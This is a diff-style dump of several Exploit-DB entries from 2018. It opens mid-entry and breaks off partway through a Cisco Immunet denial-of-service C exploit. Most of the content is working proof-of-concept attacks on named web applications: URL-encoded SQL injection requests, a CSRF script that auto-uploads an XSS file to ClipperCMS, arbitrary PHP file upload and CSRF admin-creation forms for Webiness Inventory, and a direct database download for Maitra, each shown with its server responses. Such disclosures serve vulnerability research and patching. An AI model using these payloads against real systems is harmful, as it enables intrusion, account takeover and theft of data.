# Vendor Homepage: http://snowhall.com/store/silurus/
# Software Link: https://netcologne.dl.sourceforge.net/project/silurus/silurus_2.0.zip
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/wcategory.php?ID=[SQL]
#
GET /[PATH]/wcategory.php?ID=%36%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9ujoo8291nqkbribmilpl0sdo3; __utma=112705988.1527518065.1541929662.1541929662.1541929662.1; __utmb=112705988.1.10.1541929662; __utmc=112705988; __utmz=112705988.1541929662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 11 Nov 2018 08:48:25 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

82
exploits/php/webapps/45839.txt Normal file
View file

@ -0,0 +1,82 @@
# Exploit Title: ClipperCMS 1.3.3 File Upload CSRF Vulnerability
# Date: 2018-11-11
# Exploit Author: Ameer Pornillos
# Website: http://ethicalhackers.club
# Vendor Homepage: http://www.clippercms.com/
# Software Link: https://github.com/ClipperCMS/ClipperCMS/releases/tag/clipper_1.3.3
# Version: 1.3.3
# Tested on: Windows 10 x64 (XAMPP, Firefox)
# CVE : CVE-2018-19135
* Description:
ClipperCMS 1.3.3 does not have CSRF protection on its kcfinder file upload
which is being used by default. This can be used by an attacker to perform
actions for an admin (or any user with file upload capability). With this
vulnerability, it can automatically upload file/s (by default it allows
aac,au,avi,css,cache,doc,docx,gz,gzip,htm,html,js,mp3,mp4,mpeg,mpg,ods,odp,odt,pdf,ppt,pptx,rar,tar,tgz,txt,wav,wmv,xls,xlsx,xml,z,zip
as file types). Note that web shell that can be used for remote code
execution can be achieved depending on the file types being accepted.
Uploaded file can be accessed publicly on the "/assets/files" directory
(e.g. uploaded a malicious html file with filename: poc.html file =>
http://<clipperwebsite>/clipper/assets/files/poc.html).
This can lead for the website to be host unintended file/s.
*Steps to reproduce:
Admin (or user with file upload capability) logged in ClipperCMS 1.3.3 ->
browse/open a controlled website (e.g. by link or open PoC below in a
browser where admin/user logged in to ClipperCMS 1.3.3) with the poc below
-> file is uploaded and can be accessed on http://
<clipperwebsite>/clipper/assets/files/poc.html
*Proof of Concept:
PoC below will automatically upload a "poc.html" file with simple XSS
payload. Steps above are how to make use of the PoC.
<html>
<!-- CSRF Auto Upload File ClipperCMS PoC -->
<body>
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST",
"http:\/\/clipperwebsite\/clipper\/manager\/media\/browser\/kcfinder\/browse.php?type=files&lng=en&act=upload",
true);
xhr.setRequestHeader("Accept",
"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data;
boundary=---------------------------167248871811044278431417596280");
xhr.withCredentials = true;
var body =
"-----------------------------167248871811044278431417596280\r\n" +
"Content-Disposition: form-data; name=\"upload[]\";
filename=\"poc.html\"\r\n" +
"Content-Type: text/html\r\n" +
"\r\n" +
"\x3cscript\x3ealert(\'XSS\')\x3c/script\x3e\n" +
"\r\n" +
"-----------------------------167248871811044278431417596280\r\n"
+
"Content-Disposition: form-data; name=\"dir\"\r\n" +
"\r\n" +
"files\r\n" +
"-----------------------------167248871811044278431417596280--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
</script>
</body>
</html>
*Proof of Concept Demo:
Actual video demo of the vulnerability being exploited is available on:
https://youtu.be/bEYqb99MdYs
*Reference:
https://github.com/ClipperCMS/ClipperCMS/issues/494

48
exploits/php/webapps/45840.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload
# Dork: N/A
# Date: 2018-11-11
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://demo.aliveparish.com
# Software Link: https://netcologne.dl.sourceforge.net/project/aliveparish/aliveparish-v2.0.zip
# Version: 2.0.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/parish/search?key=[SQL]
#
GET /[PATH]/parish/search?key=%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=d98c14a2b1f274925e7993331153a20d
Connection: keep-alive
HTTP/2.0 500 Internal Server Error
Server: nginx
Date: Sun, 11 Nov 2018 09:18:22 GMT
Content-Type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Firefox-Spdy: h2
# POC:
# 2)
# http://localhost/[PATH]/person/photo/1
#
# http://localhost/[PATH]/images/uploaded/[FILE]
#
<html>
<body>
<form enctype="multipart/form-data" id="families-form" action="http://localhost/[PATH]/person/photo/1" method="post">
<input id="ytPeople_raw_photo" value="" name="People[raw_photo]" type="hidden">
<input name="People[raw_photo]" id="People_raw_photo" type="file">
<input name="yt0" value="Save" type="submit">
</form>
</body>
</html>

70
exploits/php/webapps/45841.txt Normal file
View file

@ -0,0 +1,70 @@
# Exploit Title: Maitra - Mail Tracking System 1.7.2 - SQL Injection / Database File Download
# Dork: N/A
# Date: 2018-11-11
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://salzertechnologies.com/
# Software Link: https://netcologne.dl.sourceforge.net/project/maitra/maitra/maitra-desktop-v1.7.2.zip
# Version: 1.7.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# Server : Mongoose web server v.5.6 [FREE EDITION]
# Default listening_port: 8080,8081,8082
# POC:
# 1)
# http://localhost/[PATH]/application/db/maitra.sqlite
#
GET /[PATH]/application/db/maitra.sqlite HTTP/1.1
Host: TARGET:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 11 Nov 2018 11:04:24 GMT
Last-Modified: Sun, 11 Nov 2018 10:46:47 GMT
Etag: "5be80897.1114112"
Content-Type: text/plain
Content-Length: 1114112
Connection: keep-alive
Accept-Ranges: bytes
# POC:
# 2)
# http://localhost/[PATH]/?c=outmail&m=outmailentry&mailid=[SQL]
#
GET /[PATH]/?c=outmail&m=outmailentry&mailid=-1)%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2csqlite_version()%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2d%2d HTTP/1.1
Host: TARGET:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b
Connection: keep-alive
HTTP/1.1 200 OK
X-Powered-By: PHP/5.5.10
Set-Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b; expires=Sun, 11-Nov-2018 12:48:15 GMT; Max-Age=7200; path=/
Content-Type: text/html
Transfer-Encoding: chunked
# POC:
# 3)
# http://localhost/[PATH]/?c=inmail&m=inmailentry&mailid=[SQL]
#
GET /[PATH]/?c=inmail&m=inmailentry&mailid=%2d%31%29%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%73%71%6c%69%74%65%5f%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2d%2d HTTP/1.1
Host: TARGET:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229bc792cd7f3df106dfaa30c4f9838dfb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541931921%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D23567922d51348e5db91632764ff616f7d5670ad
Connection: keep-alive
HTTP/1.1 200 OK
X-Powered-By: PHP/5.5.10
Set-Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b; expires=Sun, 11-Nov-2018 12:44:07 GMT; Max-Age=7200; path=/
Set-Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b; expires=Sun, 11-Nov-2018 12:44:07 GMT; Max-Age=7200; path=/
Content-Type: text/html
Transfer-Encoding: chunked

146
exploits/php/webapps/45842.txt Normal file
View file

@ -0,0 +1,146 @@
# Exploit Title: Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery Add Admin)
# Dork: N/A
# Date: 2018-11-11
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://github.com/webiness/webiness_inventory
# Software Link: https://kent.dl.sourceforge.net/project/webinessinventory/2.3/webiness_inventory-2.3.zip
# Version: 2.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php
#
# http://localhost/[PATH]/runtime/PartnerModel/[FILE]
#
POST /[PATH]/protected/library/ajax/WsSaveToModel.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------19855571512095910543502690828
Content-Length: 384
-----------------------------19855571512095910543502690828
Content-Disposition: form-data; name="model_name"
PartnerModel
-----------------------------19855571512095910543502690828
Content-Disposition: form-data; name="logo"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------19855571512095910543502690828--
HTTP/1.1 200 OK
Date: Sun, 11 Nov 2018 16:57:15 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
#
GET /[PATH]/runtime/PartnerModel/phpinfo.php HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 11 Nov 2018 16:58:27 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php
#
# http://localhost/[PATH]/runtime/PartnerModel/[FILE]
#
<html>
<body>
<form action="http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php" method="POST" enctype="multipart/form-data">
<input name="model_name" value="PartnerModel" type="hidden">
<input name="logo" type="file">
<button type="submit">Ver Ayari</button>
</form>
</body>
</html>
# POC:
# 3)
# http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php
#
<html>
<body>
<form action="http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php" method="POST" enctype="multipart/form-data">
<input name="model_name" value="Ws_userModel" type="hidden">
<input name="id" value="3" placeholder="user_id" type="number">
<input name="email" value="" placeholder="mail_address" type="text">
<input name="password" value="" placeholder="password" type="password">
<input name="user_salt" value="" type="hidden">
<input name="verification_code" value="" type="hidden">
<input value="false" name="is_verified" type="hidden"><input name="is_verified" value="true" data-val="true" class="" type="checkbox"> verified account?</label></div></div>
<input value="false" name="is_active" type="hidden"><input name="is_active" value="true" data-val="true" class="" type="checkbox"> active account?</label>
<button type="submit">Ver Ayari</button>
</form>
</body>
</html>
#
POST /[PATH]/protected/library/ajax/WsSaveToModel.php HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------712753139516771986337452300
Content-Length: 989
-----------------------------712753139516771986337452300
Content-Disposition: form-data; name="model_name"
Ws_userModel
-----------------------------712753139516771986337452300
Content-Disposition: form-data; name="id"
66
-----------------------------712753139516771986337452300
Content-Disposition: form-data; name="email"
efe@omerefe.com
-----------------------------712753139516771986337452300
Content-Disposition: form-data; name="password"
efe
-----------------------------712753139516771986337452300
Content-Disposition: form-data; name="user_salt"
-----------------------------712753139516771986337452300
Content-Disposition: form-data; name="is_verified"
1
-----------------------------712753139516771986337452300
Content-Disposition: form-data; name="is_active"
1
-----------------------------712753139516771986337452300
Content-Disposition: form-data; name="verification_code"
-----------------------------712753139516771986337452300--
HTTP/1.1 200 OK
Date: Sun, 11 Nov 2018 17:19:11 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
/* `exploitdb`.`ws_user` */
$ws_user = array(
array('id' => '66','email' => 'efe@omerefe.com','password' => 'f91f01637f051f2d44d6ee847e4bd339e7f89aab11ace6ab30c6c0af9d0f91fdcf90deb1e01a26320fe551c778c26ed57501f8cab4a026d3eaffbacdd3838794','user_salt' => '29tevoxs9n8lygh1w4xagv4j0w5w4q4ti3nokzsm0655zjl2ci','is_verified' => '1','is_active' => '1','verification_code' => '')
);

32
exploits/php/webapps/45843.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: Webiness Inventory 2.3 - SQL Injection
# Dork: N/A
# Date: 2018-11-11
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://github.com/webiness/webiness_inventory
# Software Link: https://kent.dl.sourceforge.net/project/webinessinventory/2.3/webiness_inventory-2.3.zip
# Version: 2.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/protected/library/ajax/WsModelGrid.php
#
POST /[PATH]/protected/library/ajax/WsModelGrid.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 541
model=PartnerModel&order=%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%32%3d%32%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
HTTP/1.1 500 Internal Server Error
Date: Sun, 11 Nov 2018 16:16:54 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 315
Connection: close
Content-Type: text/html; charset=UTF-8

81
exploits/php/webapps/45844.txt Normal file
View file

@ -0,0 +1,81 @@
# Exploit Title: SIPve 0.0.2-R19 - SQL Injection
# Dork: N/A
# Date: 2018-11-11
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/sipve/
# Software Link: https://datapacket.dl.sourceforge.net/project/sipve/sipve-v0.0.2-R19.tar.gz
# Version: 0.0.2-R19
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/monitorasoc/view/monitorasocAcc.php?usuario=[SQL]&accion=asociar
#
GET /[PATH]/monitorasoc/view/monitorasocAcc.php?usuario=%31%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%45%66%65%29%2d%2d%20%45%66%65&accion=asociar HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=p5kifla1c6ge33dkui0eijm2e2
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 11 Nov 2018 18:56:49 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/grupo/view/getGrupoFuncionLoaded.php?idgrupo=[SQL]&accion=1
#
GET /[PATH]/grupo/view/getGrupoFuncionLoaded.php?idgrupo=%31%27%29%20%52%4c%49%4b%45%20%28%53%45%4c%45%43%54%20%28%43%41%53%45%20%57%48%45%4e%20%28%36%36%3d%36%36%29%20%54%48%45%4e%20%31%20%45%4c%53%45%20%30%78%32%38%20%45%4e%44%29%29%2d%2d%20%45%66%65&accion=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=p5kifla1c6ge33dkui0eijm2e2
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 11 Nov 2018 18:58:53 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/monitorremoto/view/setStatusEvento.php?idevento=[SQL]
#
GET /[PATH]/monitorremoto/view/setStatusEvento.php?idevento=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=p5kifla1c6ge33dkui0eijm2e2
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 11 Nov 2018 19:01:04 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

189
exploits/windows/dos/45829.c Normal file
View file

@ -0,0 +1,189 @@
/*
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CISCO-IMMUNET-AND-CISCO-AMP-FOR-ENDPOINTS-SYSTEM-SCAN-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
***Greetz: indoushka | Eduardo B.***
[Vendor]
www.cisco.com
[Multiple Products]
Cisco Immunet < v6.2.0 and Cisco AMP For Endpoints v6.2.0
Cisco Immunet is a free, cloud-based, community-driven antivirus application, using the ClamAV and its own engine.
The software is complementary with existing antivirus software.
Cisco AMP (Advanced Malware Protection)
Advanced Malware Protection (AMP) goes beyond point-in-time capabilities and is built to protect organizations before, during, and after an attack.
[Vulnerability Type]
System Scan Denial of Service
[CVE Reference]
CVE-2018-15437
Cisco Advisory ID: cisco-sa-20181107-imm-dos
Cisco Bug ID: CSCvk70945
Cisco Bug ID: CSCvn05551
CVSS Score:
Base 5.5 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:X/RL:X/RC:X
[Security Issue]
A vulnerability in the system scanning component of Cisco Immunet and Cisco Advanced Malware Protection (AMP) for Endpoints running on
Microsoft Windows could allow a local attacker to disable the scanning functionality of the product.
This could allow executable files to be launched on the system without being analyzed for threats.
The vulnerability is due to improper process resource handling.
An attacker could exploit this vulnerability by gaining local access to a system running Microsoft Windows and protected by Cisco Immunet or
Cisco AMP for Endpoints and executing a malicious file.
A successful exploit could allow the attacker to prevent the scanning services from functioning properly and ultimately prevent the system from
being protected from further intrusion.
There are no workarounds that address this vulnerability.
Issue is due to a NULL DACL (RW Everyone) resulting in a system scan Denial Of Service vulnerability for both of these endpoint protection programs.
The affected end user will get pop up warning box when attempting to perform a file or system scan,
"You Can Not Scan at This Time
"The Immunet service is not running.
Please restart the service and retry."
Below I provide details to exploit Cisco Immunet, however "Cisco AMP For Endpoints" is also affected so the exploit can easily be ported.
[References]
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181107-imm-dos
[Vulnerability Details]
Pipe is Remote Accessible PIPE_REJECT_REMOTE_CLIENTS not present.
FILE_FLAG_FIRST_PIPE_INSTANCE not present.
Max Pipe Instances = FF (255)
loc_140028140:
lea rax, [rbp+57h+pSecurityDescriptor]
mov [rbp+57h+SecurityAttributes.nLength], 18h
